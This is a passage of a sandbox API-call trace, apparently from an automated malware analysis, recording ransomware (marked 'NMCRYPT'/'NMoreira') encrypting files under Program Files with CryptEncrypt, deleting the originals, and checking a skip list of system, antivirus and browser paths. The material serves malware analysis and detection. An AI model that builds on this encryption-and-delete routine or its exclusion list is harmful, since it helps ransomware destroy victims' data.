lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.089] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.089] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.089] GetLastError () returned 0x0 [0157.089] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.089] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0xe8, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0xe8, lpOverlapped=0x0) returned 1 [0157.089] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xe8, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xf0) returned 1 [0157.089] GetLastError () returned 0x0 [0157.089] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0xf0, lpOverlapped=0x0) returned 1 [0157.089] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0157.089] WriteFile (in: hFile=0x588, lpBuffer=0x607d50*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0157.089] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml")) returned 0x20 [0157.089] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml", dwFileAttributes=0x20) returned 0 [0157.089] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 1 [0157.090] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml")) returned 0 [0157.090] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" [0157.090] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 1 [0157.090] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD8D5.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd8d5.tmp")) returned 0xd8d5 [0157.091] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD8D5.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd8d5.tmp"), dwFlags=0x1) returned 0 [0157.091] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD8D5.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd8d5.tmp")) returned 1 [0157.092] CryptDestroyKey (hKey=0x9ad378) returned 1 [0157.092] wcslen (_String="OK") returned 0x2 [0157.092] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.092] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.092] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0157.092] CryptDestroyHash (hHash=0x9ad138) returned 1 [0157.092] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0157.092] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*NMCRYPT") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*Recovers your files.html") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*.exe") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*.dll") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*.lnk") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*.bat") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*.ini") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*.msi") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*.scf") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*pagefile.sys*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*NTUSER.DAT*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*AppData*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*\\winrar\\*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*\\java\\*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*\\windows\\*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*\\ESET\\*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*\\AVG\\*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*\\AVIRA\\*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*Atheros*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*Realtek*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*bootmgr*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*boot*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*boot*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*CONFIG.SYS*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*IO.SYS*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*MSDOS.SYS*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*NTDETECT.COM*") returned 0 [0157.092] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*ntldr*") returned 0 [0157.093] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*chrome*") returned 0 [0157.093] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*opera*") returned 0 [0157.093] PathMatchSpecW (pszFile="ko-kr.xml", pszSpec="*firefox*") returned 0 [0157.093] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml", pszSpec="*") returned 1 [0157.093] strlen (_Str="NMoreira") returned 0x8 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.094] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 